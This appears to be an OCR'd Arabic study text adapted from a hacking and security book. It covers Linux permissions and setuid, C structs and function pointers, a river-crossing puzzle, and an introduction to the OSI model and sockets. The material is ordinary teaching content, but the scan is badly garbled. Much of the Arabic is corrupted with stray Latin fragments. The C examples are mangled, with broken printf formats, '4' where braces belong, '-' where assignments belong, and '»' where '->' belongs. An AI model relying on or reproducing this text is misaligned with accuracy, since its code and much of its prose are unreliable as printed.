reader@hacking:~/booksre $ 


لاحظ في السطر الأول آنه Gen‏ تصاریح للملف simplenote‏ باستخدام الأمر 0 كالتالي: 
for the owner, 3 for Group, and 1 for Others‏ 7 

ماذا تعني 7 $6532 

job + tne‏ هذه الال 


(4+2+1)=7 
Since 4 is read flag, and 2 is write flag, and 1 is the execute flag!, then the sum is 7 
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والآن ما J'Y»‏ الرقم 3 المعطى لل *..Group‏ 
à e‏ الأمر الذي يليه» سيقوم بنزع صلاحيات ال write‏ وال execute‏ منهم .user,group.other laq‏ 


لاحظ أنه لم la‏ صلاحية ال read‏ من الأساس إلى JS‏ من ال Group, and Other‏ 
سننتقل OSU‏ إلى ال -User IDs‏ 


User IDs 


à‏ نظام التشغيل fet «Linux‏ ال root user‏ على 0 = id‏ حيث تعنى /4 Administrator Account‏ هناك بعض 
الثغرات التى LEE‏ من الوصول لل 0 id‏ باستخدام بعض ال functions‏ مثل ) .getuid(‏ 


indi 


دعنا نشاهد حرجات الأمر 10 حيث یظهر لك ال id‏ المعطاة لك: 


reader@hacking:~/booksre $ id matrix 

uid-500 (matrix) gid-500 (matrix) groups-500 (matrix) 
reader@hacking:~/booksre $ id root 

uid=0 (root) gid=0 (root) groups=0 (root) 
reader@hacking:~/booksrcec $ 


سنقوم بعمل «log out‏ 3 الدخول ب account‏ آخر cr‏ فتح coul az‏ الخاصة بال user reader‏ سنحاول 
فتح مَلف ال notes‏ الذي كتبنا كود إضافة الجُملة بداخله من قبل. 
3 


Programming 
[87] 


hacking: /home/reader/booksrc $ 

hacking:/home/reader/booksrc 5 15 -1 /tmp/notes 

rw 1 reader reader 36 2007-09-07 05:20 /tmp/notes 
jose@hacking: /home/reader/booksre $ ./simplenote "a note for jose" 
[DEBUG] buffer 8 0x804a008: 'a note for jose' 

[DEBUG] datafile @ 0x804a070: '/tmp/notes' 

[!!] Fatal Error in main() while opening file: Permission denied 
jose@hacking: /home/reader/booksre $ cat /tmp/notes 

cat: /tmp/notes: Permission denied 
jose@hacking:/home/reader/booksre $ exit 

exit 

reader@hacking:~/booksre $ 


DO DW 


ولكن ماذا لو أراد أكثر من user‏ لعمل access‏ لنفس الملف أو إجراء تعديلات عليه؟. مثلاً ملف letc/passwd‏ 


يحتوي على بيانات ال users‏ ومنها ال default shell‏ الخاص بكل منهم. 


ماهذا ال *Shell‏ 
إنه برنامج يستقبل منك commands‏ ليقوم بإرساها إلى ال Operating System‏ ..لقد كان ال user interface‏ 
الوحيدة التي تحقق التواصل بينك وبين ال 0.5 في بدايات ظهور ال UNIX‏ تم ظهرت ال GUI‏ بعد ذالك لتُسهل 


بعض الأمور إلا أنه لا غنى عنه!. 


الأشهر من هذه ال shells‏ هو ال Bash‏ حيث هو الأقدم والافضل أيضاً يوجد عدة أنواع أخرى كال 
.ksh, tcsh, and zsh‏ 
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Lacu‏ هنا linux of‏ يُعطي الصلاحية لاي مُستخیم Ob‏ يقوم بتَغيير ال default shell‏ الخاص es‏ بمعنی أنه سَیقوم 
بإجراء تعديل على السطر الخاص به lia)‏ الْمستخدم) داخل ملف CASS etc/passwd‏ سَيقوم paii‏ عادي 
سنستخدم خاصية في النظام تَسمّى ."Set User Id Permission"‏ 


هل تتذكر ال .!“read, write, and execute permissions"‏ 
Lal permission e Setuid‏ نستطيع إضافتها لأحد البرامج» وإذا ما 45 استخدام هذا البرنامج من قبل ae‏ ال 


5 فإنه يتعامل مع ال 0.5 بصلاحيات ال .root‏ 


ais‏ للبرنامج الصغیر الذي يقوم بإجراء عملية التغيير لنوع ال ge shell‏ بك!ء a|‏ "طقطه". نقوم بكتابته في ال 


(S terminal‏ هی Ta «chsh‏ حيتها هذا البرنامج id‏ جَديدَة ومؤقتة» BUS‏ عليها “Effective id"‏ كى يتسنى له 


AXE É‏ الإنتهاء e sca‏ بالعودّة إلى ال real id‏ وهي ال id‏ الطبيعية ADL‏ بك. 


reader(ühacking:-/booksrc $ which chsh 

/usr/bin/chsh 

reader@hacking:~/booksre $ 1s -1 /usr/bin/chsh /etc/passwd 
-rw-r--r-- 1 root root 1424 2007-09-06 21:05 /etc/passwd 
-rws/r-x/r-x 1 root root 23920 2006-12-19 20:35 /usr/bin/chsh 
reader@hacking:~/booksre $ 


کا ترى» خرف ال (5) یظهر في آول خانة دی ال chsh‏ بینا غير مو جود لدی ال letc/passwd‏ 
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كاك ها Las‏ كد اننا zoe‏ لأي برنامج لديك باس ستخدام الأمر “chmod u+s"‏ 


LÀ‏ لنجرّب هذا بمثال. 


getuid( ( Tc function باستخدام‎ effectve id و ال‎ real id ال‎ t مايل كود صغير يَعرض‎ 


#include <stdio.h> 


int main() 4 
printf ("real uid: $dWMn", getuid()); 
printf ("effective uid: $dMn", geteuid()); 


) 


سَتحفظ هذا الكود بإسم uid.c‏ 


هذا البرنامج aso‏ بصلاحيات صاحبه وهو اليوزر "reader"‏ كايلٍ: 


reader@hacking:~/booksre 5 ./uid 
real uid: 999 

effective uid: 999 
reader@hacking:~/booksrce $ 


والآن سَنقوم بتنفيذ الامر (chmod uts)‏ انتبه للحرف «(s)‏ يظهر (à‏ خانة ال owner‏ (أول خانة). 


reader@hacking:~/booksre $ sudo chmod uts ./uid 
reader@hacking:~/booksre $ ls -1 uid demo 
1 
g: 


-rws/r-x/r-x root root 6825 2007-09-07 05:32 uid 
reader@hacking:~/booksre $ ./uid 

real uid: 999 
effective uid: O0 
reader@hacking:~/booksre $ 


لاحظ استخدام الأمر ‘Sudo‏ فبدونه UE A‏ إضافة ال (Setuid permission)‏ هذا الملف. 
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سننتقل OV!‏ إلى ال .."Structs"‏ 


Structs 


هل تتذکر ال SArray‏ 

m 25 n. " 5 > 2682 

كنا نعرفها بأنها عبارة عن de pot‏ من العناصر من نفس النوع مجتمعة مع بعضها. 

Array is collection of the elements of same type. 

ال Struct‏ حمل تفس toe‏ ال zé array‏ آنه يُستَخدّم في حالات dada ssi‏ هو في النهاية عبارة عن متغير 
i 7 s w K ۴‏ و £ vi‏ 

Variable‏ لكنه من نوع Ne i! ele‏ أنه تحمل بداخله متغيرات آخری متعددة» Lal NEQU‏ حمل variables‏ ذات 


ak data types 


(à‏ هو ال struct‏ ؟ 


“Is a composition of the different variables of different data types, grouped under same name” 
هذا ال‎ .record | A25 struct [ox ما» سَنقوم‎ NV à خاصة بطلاب‎ records x 55 okies. d Sed 
الدراسية تاريخ ميلاد الطالبء .. الخ.‎ EIT منها إسم الطالب.‎ AEE بداخله مُتَغيرات من أنواع‎ foots struct 


.Recoed Tea Z5 (members) لاحظ أن کا هذه مُتَغرات‎ 
(e E ca pm 2 
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Struct Record 1 
char name[64]; 
char course[128]; 
int age; 
int year; 


لنعطي مثال آخر: 


struct tm { 


int tm sec; /* seconds */ 

int tm min; /* minutes */ 

int tm hour; /* hours */ 

int tm mday; /* day of the month */ 

int tm mon; /* month */ 

int tm year; /* year */ 

int tm wday; /* day of the week */ 

int tm yday; /* day in the year */ 

int tm isdst; /* daylight saving time */ 


هذا ال struct‏ إسمه tm‏ إختصاراً لل “Time”‏ يحوي بداخله جموعة من ال variables‏ 
في الحقيقة نقوم باشتقاق object‏ من هذا ال struct‏ قوم بالتعامل مَعَهُ بكل Lad aur‏ يُمكننا اشتقاق أكثر من 


struct من نفس هذا ال‎ object 
شكوة الأ اک وموس د ذه الور‎ 
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القرسنة الإلكترونية وأمن المعلومات 


SFIS‏ في الصورة» هذا الدلو هو ال Struct‏ وهذا الشكل الترابي قاع بأخذ تفس شکل الدلوء نفس صفاته.. بالمعنى 
البريحى: ا cb ue‏ ال «struct‏ أو كما yall‏ 0 عليها Elements‏ أو |S» -Attributes‏ تعلم فإنه بإمكاننا اشتقاق 


أي عدد من ال objects‏ الترابية من هذا الدلو.. ال “Struct”‏ 
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هیا نُجَرّبٍ هَذا الأمر بترنامج صغير: 


#include <stdio.h> 
#include <time.h> 


int main() 4 
long int seconds since epoch; 
struct tm current time, *time ptr; 
int hour, minute, second, day, month, year; 


seconds since epoch = time(0); // Pass time a null pointer as argument. 


printf("time() - seconds since epoch: %ld\n", seconds since epoch); 
time ptr = &current time; // Set time_ptr to the address of the current. time struct. 


localtime r(&seconds since epoch, time ptr); 


// Three different ways to access struct elements: 


hour = current time.tm hour; // Direct access 
minute = time ptr-»tm min; // Access via pointer 
second - *((int *) time ptr); // Hacky pointer access 


printf("Current time is: 5020: 5020: %02d\n", hour, minute, 
second); 


declare sx s Lad pointer *time ptr li jE d «object current time في بداية البر نامج قمنا باشتقاق‎ 
."time.h library" à i وهى‎ «time( ) mb function استخدام‎ e عدد كبير!.‎ Spe ay long int žá 
.1/1/1970 هو‎ base line ك‎ Ne عدد الثوانى المحسوبه منذ وقت‎ UJ تقوم هذه ال 0 بإرجاع‎ 


ثم قمنا بجعل ال pointer time. ptr‏ يشير إلى ال "address of our object"‏ وهو current time‏ يحوي هذا ال 


object‏ ال elements‏ الموجودة 3( ال less struct tm‏ فارغة!. 
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تذكر أنها variables‏ بمعنى أننا سوف تملاها الآن» سنستخدم function‏ بإسم ( localtime r(‏ لتقوم Ste‏ هذه ال 
5 بالتوقيت SAI‏ 

4 أخيراً نستخدم ( printf(‏ لتعرض UJ‏ التوقيت JH‏ بالساعات والدقائق والثواني» وذلك عن طريق استدعائهم من 
هذا ال Object‏ بعد ol‏ قامت ) locate r(‏ بملئهم. 


سنستخدم ثلاثة Ads G‏ أثناء استدعائنا لكل من هذه ال Elements‏ الثلائة المكونين للساعات والدقائق والثواني. 


" أشهرهم الطريقة الأول وهي أن نستدعيه object.strct. element : b |S‏ 

قمنا باستخدام هذه الطريقة والساة “direct access”‏ لعمل access to the hour element‏ 
" الطريقة الثانية وهي الدخحول باستخدام ال ;pointer‏ 

تذكر أننا قمنا بعمل pointer time. ptr J declare‏ وجعلناه يشير إلى ال object‏ 

فسنقوم باستخدام الرمز >- لنتمكن من الدخول الى ال element‏ الذي نريده! هنا اخترنا الدقائق! 
* الطريقة الثالثة (وهي طريقة غير مُباشرة!): 

Sá‏ أننا ننتهي من الأقواس الداخلية أولاً ثم الأقواس الخارجية.. 


لقد قمنا بتحويل ال "time ptr pointer"‏ إلى integer pointer‏ عن طريق عمل Cast‏ له کا یل: 


(int *) time ptr 
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هذاال pointer‏ يشير إلى |S "address of our object"‏ تعلم.. Ec‏ أن ال pointer‏ بشكل عام إذا كان من نوع 
int‏ فإنه gd‏ إلى أول bytes‏ 4 من ال E ..address‏ كذلك؟ بمعنى أنه مساحتة bytes‏ 4 یضع مها أول 4 
bytes‏ من ال address‏ الذي يشير إليه. 

وإذا آلقینا نظرة على هذا ال object‏ الذي يُشير إليه فسَنلاحظ الآني: 


struct tm { 
int tm sec; /* seconds */ 


لاحظ أن ال element‏ الأولى à‏ ال Struct‏ هی ال 0 بمعنی Lal‏ تقع à‏ أول bytes‏ 4 من ال ON «struct‏ 
ال struct‏ نفسه JN‏ مساحة !.. بل dl variables Jl‏ هی TES al‏ هذا رائع !ل ثم Es‏ بوضع )*( 


أخرى بالخار C.‏ لنقو e‏ بعمل dereference‏ لهذا ال int pointer‏ 


لنرى le‏ خر جات هذا الكود: 


reader@hacking:~/booksre $ gcc time example.c 
reader@hacking:~/booksre $ ./a.out 

time() - seconds since epoch: 89311588 
Current time is: 04:19:48 
reader@hacking:~/booksre $ ./a.out 

time() - seconds since epoch: 89311600 
Current time is: 04:20:00 


reader@hacking:~/booksre $ 
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Function Pointers 


نحن OV‏ على دراية جيدة cPointers JU‏ لذا سنبداً JELL‏ دون مقدمات: 


#include <stdio.h> 


€ 


func one() { 
printf("This is function one\n”); 
return 1; 


int 


int func two() 1 
printf("This is function two\n”); 
return 2; 


int main() 4 
int value; 
int (*function ptr)(); 
function ptr - func one; 


printf (“function ptr is 0x%08x\n”, function ptr); 
value function ptr(); 


printf (“value returned was %d\n”, value); 


function ptr - func two; 
printf (“function ptr is 0x%08x\n”, function ptr); 
value = function ptr(); 
printf (“value returned was %d\n”, value); 
} 
ع راع‎ 5 bar e ۱ 5 ۰ a 7 
Arguments J ili Y function ال‎ et أن‎ int func. one( ) بداية.. نعنی ذا القوس الفارغ‎ 
:© العجيبة‎ pointers هذا النوع من ال‎ es main( ) إلى ال‎ gl 
int (*function ptr) (); 
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لاحظ معي: 

هذا ال pointer‏ ..هو Pr "*function ptr"‏ إلى Function‏ ما وهي ال ( ).. i EN‏ نحددها بعد!. هذه ال 
ul Function‏ جع value UJ‏ ذات data type‏ من نوع Integer‏ وهي int‏ 3( الکو د هنا. 3 عرّفنا int value. 4x3‏ 
لنضع به ال return‏ الخاص بال function‏ استخدمنا ال ) ( printf‏ لتقوم بعرض ال "address of function"‏ وهو 


ال .pointer‏ فهو يشر إلى ال ye peg "address of function"‏ نا ta)‏ ما aL.‏ هذه ال «function‏ حيثٌ تقوم 


بطباعة "return 1" cile‏ فقط!. = جعلناه يشير مرة أخرى إلى ال ) E. func. two(‏ إجراء call‏ بتقس الطريقة. 


لنشاهد النتائج: 


reader@hacking:~/booksre $ gcc funcptr example.c 
reader@hacking:~/booksre $ ./a.out 

function ptr is 0x08048374 

This is function one 

value returned was 1 


function ptr is 0x0804838d 
This is function two 
value returned was 2 
reader(ühacking:-/booksrc $ 


£ و‎ 3 
ees 


dM وصلت إل نهاية الباب‎ ad أمیتك..‎ o 


z« 2‏ " 
إنهُ Sled]‏ رائع !.. دعني آقدم لك مُكافأة © 
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لدينا راعي أغنام يمتلك ذئب» وماعزه وبعض العْشب. وهم الثلاثة یقفوا ىا في الصورة آمام النهر» يريدون العبور 
للجهة الأخرى. 

هذا الراعي لديه قارب صغير يُمكنه فقط أخذ شيء واحد معه أثناء العبور!ء ما يعني أنهم سيعبّرون على عدة مراحل!. 
ولكن انتبه " لا يُفترض ترك الذئب مع الماعز حیثْ من المتوقع أن MISE‏ وني نفس الوقت لا يُفترض أيضاً ترك 
الاعز وحدها مع العشب حیث من التوقع أيضاً أن تلتهمه!.. 

فكيف سنقوم بنقل الثلاثة إلى AGH!‏ الأخرى من النهر؟ 


Far Shore 


SACK 
o 
CORN 


Near Shore 
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This page intentionally left blank 


والان هيا e gi‏ باختبار ما قدمته نا من أفكار لجل هذا اللغز!: 


ادرا جا جوا 
À / The "Trick" Step‏ 
O e [1‏ 
5 4 
|| + > 0 ]| و 
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Introduction 


يقول الله تعالی في كتابه الكريم: [ وجعلناكم شعوباً وقبائل لتعارفوا ).. 

یُمکنك تخيل شخص يعيش وحيداً في جزيرة ماه تخيل ذلك لبُرهة!» ثم تخيل الشخص ذاته وهو يعيش في بل ما 
مع بشر يتكلمون نفس لغته!ء يتواصل مع الكثير منهم بشكل يومي» يقوم بمعاملات مختلفة سواءً كانت اجتماعية أو 
مادية. الفرق بسيط» فكلا الشخصين واحد!ء غير أن الأول هو الشخص at rest"‏ والثاني هو نفس الشخص ولكن 
"in dynamic"‏ هذه الديناميكية DAMALS‏ له الكثير» فالشخص الثاني سيتكامّل وينمو بسبب هذا التواصل 
والانفتاح على الآخرين.. lel‏ هدية ال (Networking)‏ له بینا الآخر سيظل ale‏ دون تحديث أو تطوير!» لعلك 
شاهدت فيلم تم انتاجه في عام 2007 اسمه "into the wild"‏ حيث يحكي قصة شاب ترك الحياة الاجتماعية وذهب 
آل غابات "آلاسکا" لیعیش وحده بمعزل عن الناس.. dy‏ النهاية وبعد أن آصابه مرض الوت وکان حینها وحیدا 


في الغابة» قام بتدوين آخر عبارة له قبل الرحیل: 
“Happiness within shared”‏ 


ثم اضجع قلیلاً وفارق ا حياة. Dy‏ من فتىّ مسكين!. 


las‏ تقوم اللغات بإثراء التعاملات بين الناس وتزيد من خبراتهم وفاعليتهم في الحياة» أيضاً EKS‏ إسقاط ذلك على 
برنامج بسيط مثل التصفح (browser)‏ ما ated‏ بدون انترنت؟ لن پستخدمه أحد حینها!» ولكن بمجرد أن يتمكن 
هذا s e‏ من التواصل مع ال web servers‏ في كل مكان باستخدام بروتوكولات الإتصال المختلفة.. حينها ستظهر 
قيمتة الحقيقية!. أليس كذلك؟. 
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من المعروف أن العديد من ال Applications‏ تعتمد على بيئة الشبكات كى تتمكن من إيصال خدماتها إلى 
ال «end users‏ ربا تختلف أنواع البروتوكولات التى تعتمد عليها هذه ال applications‏ ولکن تبقى في النهاية 
السمات العامة المشتركة هذه البروتوكولات 3( آليات نقلها للبيانات! "transport methods"‏ 


سنقوم في هذا الباب إنشاء الله بشرح أساسيات الشبكات وبروتوكولاتهاء ثم الإنتقال إلى ال "Sockets"‏ لتوضيح 


ماهيتهاء وكيفية إنشائها واستخدامها في لغة ال ©. 


هیا بنا.. 
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The OSI Model 


Application 


Presentation 


Session 


Transport 


Network 


Data Link 


Physical 


يقوم هذا ال OSI Model‏ بتقسيم ال Network Communications Process‏ 
إلى طبقات (Layers)‏ 

هذه الطبقات تعتمد غلل بعضها ن آداء الوظيفة ا فمثلاً إذا فرضنا أن طبقة ما 
ولتكن ال «Transport Layer‏ وظيفتها هي إيصال ; JU.‏ إلى ال ‘Destination‏ 
مع التأكد ين أن الرسالة وَصَلّت» وإذا af Í‏ فستقوم باعادة الارسال. وبالنظر 
إلى هذه ال Service‏ المقَدّمة من هذه الطبقة سَنجد آنها تسير كالآتي: 

الطبقة التي تقع أسفل منها وهي ال Service NS «Network Layer‏ اشا 
وهي ate‏ الرسالة من ال Source‏ إلى ال «lax: Destination‏ ستقوم بإيصال ال 
Packet‏ من مكان إلى مَکان آخرء بدون إجراء عملية التأكد من الوصول وإعلام 
ال «Source‏ أو إعادة الارسال في حال خدوث «ME‏ فهذه ib;‏ الطبقة التي 
تعلوها!. 

وبالتالي تعمد ال )4 (Layer‏ على ال )3 (Layer‏ في تقدیم خذّماتها» وبالمثل.. 
هذه ال )3 (Layer‏ سَتعتمد على ال )2 (Layer‏ في إكمال عَمّلية إيصال ال packet‏ 


إلى الطرّف الآخر.. 
وهذاما تُطلق عليه بال "Service Block"‏ 
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ما هذا ال "Service Block"‏ .,* 
إنه الاعت‌ادية بين الطبقات على بعضها البعض في آداء خدماتها. 
والان.. سَنأخذ فکرة عامة عم هَذه الطعات Ax JE‏ 


Application Layer 

هذه الطبقة التي تظهر لل end user‏ وتتمثل في ال Applications‏ بأنواعهاء ed P‏ ال Interface‏ بينة وبين جميع 
مُتعلقات الشبكات الْختلفة. 

فمثلاً يعمل في هذه الطبقة بروتوكول ال HTTP‏ وهو المسؤول عن إرسال واستقبال طلبات عرض صفحات الوب 

على متصفحك» كما يعمل بها Lal‏ البروتوكول الشهير DNS‏ وهو الذي يقوم بترجمة عناوين مواقع الانترنت 

من ال "human-readable"‏ الى ال Network Address"‏ ]۰۳32-01 حيث à g‏ قواعد ably‏ جميع عناوین الواقع 

وال a bell IP Addresses‏ كما بطريقة dy "iaga"‏ أجهزة ضخمة موزعة في عدة مواضع حول العال. 


"Data or Message" بال‎ Layer هذه ال‎ (3 packet information بط على ال‎ 


Presentation Layer 
ها یعطیها الكفاءة‎ «Application يمكن قرائتها إلى طبقة ال‎ deb Data هذه الطبقة مسؤولة عن عملية عرض ال‎ 


إتشفير أو فك تشفير ال «Data‏ ليست الطبقة الوحيدة التي يمكنها عمل التشفير وفكه. إلا أنها تستطيع القيام بذلك 
could Gs‏ ال Applications‏ 
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Session Layer 
التي يتم فتحها بين الأنظمة» فهي تقوم ببذه الوظائف:‎ "Session" تقوم هذه الطبقة بإدارة ال‎ 
Establish, manage, and terminate the connection. 


2 
we 


آیضا تقوم بتحديد ما إذا سيكو ن نوع الاتصال ."Full-Duplex or Half"‏ و Lal‏ عملية ال Graceful Shutdown‏ 


Drop من قطع الاتصال فجأة‎ Mas 


Transport Layer 


تتلخص وظيفتها بنقل ال Msgs‏ بين ال Applications‏ . 

فهي تقوم بالآتي: 

"Transport the Application Layer's Messages"‏ بين ال «(Application End points)‏ بالطبع بالاشتراك مع 
الطبقات التي تليها.. Geb‏ السوولة عَن بدء ومتابَعة وغلّق قنوات الاتصال التي يُستَخدمها ال Application‏ .. هذه 
القنوات "Sockets" d‏ ثم تقوم Cal‏ هذه الطبقة بإعطاء عناوين ال "Destination End Point"‏ إلى 


ال )3 (Layer‏ كي تتم عملية الإرسال الفعلية کا أوضحت لك في مثال ال Service Block‏ 


الهم.. يعمل في هذه الطبقة نوعين من أهم البروتوكولات, الأول TCP‏ والثاني UDP‏ 
فالأول يقوم بعملية ال Transport‏ ولكن يقدم خدمة ال Reliable Transfer‏ بمعنى أنه سيضمن لك وصول 


2 
الرسائل الرسلة وفق الترتیب الذي آرسلت 4 "Connection Oriented"‏ واعادة إرسال JU. JI‏ إذا ما اعترضها أي 
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مانع من الوصول. وبالتالي فهو بطيء s e er‏ حيث يعمل ب Algorithm‏ معقدة قلیلا يقوم ca ali‏ الذي 


يصمم ال Application‏ بتحديد ما I3]‏ کان سيعتمد على ال el TCP‏ ال Ua UDP‏ لوظيفة ونوع ال Application‏ 


نأي إلى ال UDP‏ وهو أقل تعقيداً من ال TCP‏ حيث لن يضمن لك عملية التوصيل بشكل كامل» وغذا يُطلق عليه 
“Connectionless Protocol"‏ وذلك ليعطي لنفسه الفر ob io‏ يقلص ال Header‏ الخاص به لتکون عملية 
الإرسال سريعة. 

يعتمد عليه ال DNS‏ في عمله OY‏ ال DNS‏ من البروتوكولات التي LY‏ أن تعمل بسرعة عالية.. 


"Segment" هنا‎ packet ال‎ Mee 


Network Layer 
لآخر.‎ host من‎ "Network-Layer Packets" كبير بعض الشيء!» فهي تقوم بعملية نقل ال‎ Load هذه الطبقة عليها‎ 


حيث يقوم ال TCP‏ أو ال UDP‏ بإمرار ال "Transport-Layer Segment"‏ و ال "Destination Address"‏ إلى هذه 
الطبقة ثم تبداً من هنا رحلة ال Network Layer‏ رورا بشبكات عديدة أثناء مسيرتهاء a‏ الإنتهاء إلى ال 
e Destination‏ هناك رفع ال Packet‏ إلى طبقة ال Transport‏ الخاصة JL‏ 0 فهي (The Network‏ 
Layer)‏ تستلم من ال Transport Layer‏ من جهّة MET‏ إلى ال Transport Layer‏ في الجهة الأخرى.. سكي Jl‏ 


“Datagram” فى هذه الطبقة‎ packet 
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Data-Link Layer 
القيام بتوفير ال‎ (EU من‎ Physical Network هذه الطبقة متخصصه في نقل البيانات عبر ال‎ 


Addressing Scheme‏ التی تستخدم لتعريف الأجهزة بنفسها داخل الشبكة» أو ک| يقولون: 
"Identifying Physical Devices"‏ مثل ال MAC Address‏ العطی للأجهز à‏ وال Servers‏ داخل الشبکت وتقوم 
Lal‏ ببعض الوظائف كتصحيح الأخطاءء "error correction and flow control"‏ وبعض الأدوار PEN‏ في إدارة 


الإتصال على مستوى طبقة ال Data-Link‏ کایل: 


Active, maintain, and deactivate data-link connections 


من أمثلة بعض البروتوكولات التى تعمل داخل هذه الطبقة.. ال WiFi JI Ethernet‏ تُطلّق على ال packet‏ هنا 


Frame" 


Physical Layer 

هذه الطبقة تتعامل مع ال «Row-bit Stream‏ فهی تقوم بتوصيل ال Bits‏ من node‏ إلى أخرى» والبروتوكولات 
الستخدمَة هنا تعتمد على نوع ال "Transmission Medium"‏ المستخدّمَة. 

Sed‏ تلف طبيعة الإرسال الخاصة (Twisted-Pair copper wire) JL‏ عن ال (Fiber optics)‏ وهكذا. 


ال packet‏ هنا عبارة عن “Bits”‏ 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماءهم‎ 


لاحظ معي هذه الصورة التي توضح دور WS‏ منهم: 
الصورة توضح عملية انتقال message‏ من client‏ إلى server‏ عبر الانترنت باستخدام الطبقات التى شر حناها» غير 


أنه في الحالة العامة يتم اختزال آول ثلاث طبقات في iib‏ واحدة هي ال Application‏ كما نری في الشکل: 


Client Server 


SS 


TP ATP 


emer | 1P [TCP] HTTP 


Source: Ref (5) 


:Data إرسال واستقبال ال‎ Ae M لمفهوم‎ QU 


Understanding Hacking and Information Security الإلكترونية ماهن المعلوها رنه‎ ism sall 


آثناء عملية الارسال تقوم كل طبقة باضافة بياناتها على ال Packet‏ على Header iz»‏ وكا تعني الكلمة فهي SE‏ 
"Head"‏ أو رأس oib‏ ال Packet‏ أو عنوان طاء وبالتالي فآثناء نزول ال packet‏ من أعلى إلى آسفل» یداد حجم هذا 
ال Header‏ بسَبّب عملية Bley!‏ التي تقوم ا کل b < (Appending its Header info) ib‏ عن هذه ال 
process‏ بالصطلح: “Encapsulation”‏ ..وفي ah‏ الأخرى سَیسبر PY‏ بالعکس!» من أسفل de «del di‏ آن 


Az 
08 


ال packet‏ قد وصلت إلى Physical LayerJ!‏ أو Y‏ ثم ال Data-Link‏ وهکذا... وبالتالي كل طبقة منهم ny‏ ال 


a 


a 
ما يُؤدي إلى تناقص حجم‎ Header هذا ال‎ p fo تقوم‎ pb الذي أضافته الطبقة الناظرة ها في الجهة الأحری‎ Header 
"Decapsulation" بهذا المصطلّح:‎ Process عن هذه ال‎ be صَعَدنا لأعلى. و‎ (ds Header ال‎ 
:Decapsulation وال‎ Encapsulation الشكل يوضح عملية ال‎ 


Source 


Application | | 
Transport [| 
Newor [| 
i 
1 


Message 


Datagram Hg Ht 


M 
Segment Hy M 
M 
Frame ۳۱ Hn Ht M 


Physical 


۱] ۳ 


5 Physical 


Hi Hn Ht M 


Link-layer switch 


Destination 


application | | 
Transport [| 
Fewer [| 
rink f 


Physical 


Router | 
E— — 


Ht 
Hn Ht 
Hy} Hy Ht 
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يَظهّر في الشّكل Kons‏ کل iau] oe Header‏ ب H‏ متبوعاً بأول خرف من إسم الطبقة.. لاحظ معي Si‏ ال router‏ 
أثناء مَسبرة ال Ka el Packet‏ 10 جزئي» لقد قام بنزع ال frame header‏ وأعاد صياغته بحيث 
يتضمن ال MAC‏ الخاص بالجهاز الذي يقع في الجهة الأخرى من ال Slely Subnet‏ إمرار ال packet‏ إلى ال Host‏ 
wid 9‏ ال Decapsulation‏ الكامل لديه كي تظهر ال message‏ بصيغتها المقروءة على شاشة ال „end user‏ 


ما يلي بعض البروتوکولات الخاصة بالطبقات التي فمنا بشر حها فوق: 


Layer Protocol 

Application HTTP, SMTP, FTP, Telnet 

Presentation ASCII, MPEG, JPEG, MIDI 

Session NetBIOS, SAP, SDP, NWLink 
Transport TCP, UDP, SPX 

Network IP, IPX 

Data link Ethernet, Token Ring, FDDI, AppleTalk 


هناك ملاحظة بخصوص ال Processes Communicating‏ : 
عند إنشاء Communication Session‏ من نوع Client-Server‏ فهذا يعنى أنه لابد أن تكون هذه ال Session‏ بين 


جهاز كمبيوتر مثلاً و حد ال G5 Servers‏ یتصل Server‏ ب Server‏ آخر ويبقى نوع ال Lai Session‏ 


."Client-Server" 
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إذاً.. فا تعريف هذا النوع من ال $..Sessions‏ 
نقوم بتعريف ال Process‏ التى تقوم بالبدء بإنشاء الاتصال بال «Client‏ وال Process‏ التى تنتظر أن يتصل ما 


أحدهم لتبدأ معه ال Session‏ بال Server‏ 


لنعطي مثال: 

عندما ترسل رسالة بريد إلكتروني ch ge‏ يقوم ال Agent‏ الخاص بك وهو ال Outlook‏ مثلاً على جهازك 
بالتواصل مع ال Mail Server‏ اتخاص بك. ثم یقوم هو بدوره بانشاء اتصال Mail Server JL‏ اخاص بصديقك» 
لاحظ ال OV! Communication‏ يحدث بين ال Mail Servers‏ وبالر غم من ذلك فهو من نوع -IClient-Server‏ 


فيكون ال Server‏ الخاص بك هو ال alii Client‏ عليه "SMTP Client"‏ والآخر هو ال Server‏ و iis‏ عليه 
“SMTP Server"‏ 


ولكن مالعلاقه بين ال Network Layers‏ و ال Network Protocols‏ !؟ 


نحن الآن على ple‏ بال Network Layers‏ يتبقى لنا بروتوكولات الشبكات.. مايلي تعريف pz‏ لما: 


Networking protocols specify what types of data can be sent, how each type of message will be 
identified, what actions can or must be taken by participants in the conversation. precisely.. 
“Where in the packet header each type of required information will be placed". 
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The Socket 


عندما نقوم بتشغيل برنامج ما على الکمبیوت فنکون بذلك Process gá bed‏ على هذا ال 0.5. أحياناً تحتاج 
الرامج أو ال Pues)‏ أن تتواصل مع بعضها البعض على نفس ال ۰0.5 هذا النوع Se‏ التواصل ur‏ 
DV? .“Interprocess Communication”‏ وفق فوانین یفرضها ال T EN O.S‏ 

هذا جيد!. 

ولکننا هنا sey‏ الترکیز على ال communications‏ بین ال Processes‏ التي لا تقع في نفس ال «Host‏ أو (S‏ تطلق 
"Processes on two different end systems" Lee‏ 

ولكي تقوم آحد هذه ال Processes‏ أو ال Applications‏ بارسال رسالة أو Packet‏ إلى ال Process‏ اللأخرى فنحن 
بحاجة للمُرور عبر ال "underlying network"‏ وبالتالي تقوم هذه ال Process‏ بإرسال الرسالة» وتقوم ال Process‏ 
الثانية في الجهة الأخرى باستقبال تلك dea e XL. JI‏ وهمي (Logical)‏ أو .."Software Interface"‏ هذه ال 


"Socket" علیها‎ all Software Interface 


ف| هو ال "Socket"‏ إذاً؟. 


Host ال‎ e Transport Layer و ال‎ Application Layer بين ال‎ eS Interface عبارّة عن‎ 4 


الصورة التالية توضح ال :Socket‏ 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأحن المعلوها رنه‎ 


Host or Host or 
server server 


4 


Controlled Controlled 


by application by application 
developer developer 
Controlled ۲ TCP with Controlled 

by operating buffers, ' > buffers, by operating 
System variables nemet variables qe 


وبلغة البرمجيات» نقوم بتعريف وظيفة ال ‘ble Socket‏ 


“Tt can be used to send or receive data over a network". 


ذكرنا سابقاً cea ll OT‏ الذي يُقوم يتصميم ال Application‏ سَیْحدّد نوع البروتوکول edet‏ في عَملية إرسال ال 
«Data‏ وذلك 5 لنوع ال Sex$ «Application‏ اليوتيوب eag‏ نا dss‏ ال Video Streaming‏ .. هذه الخدمة 
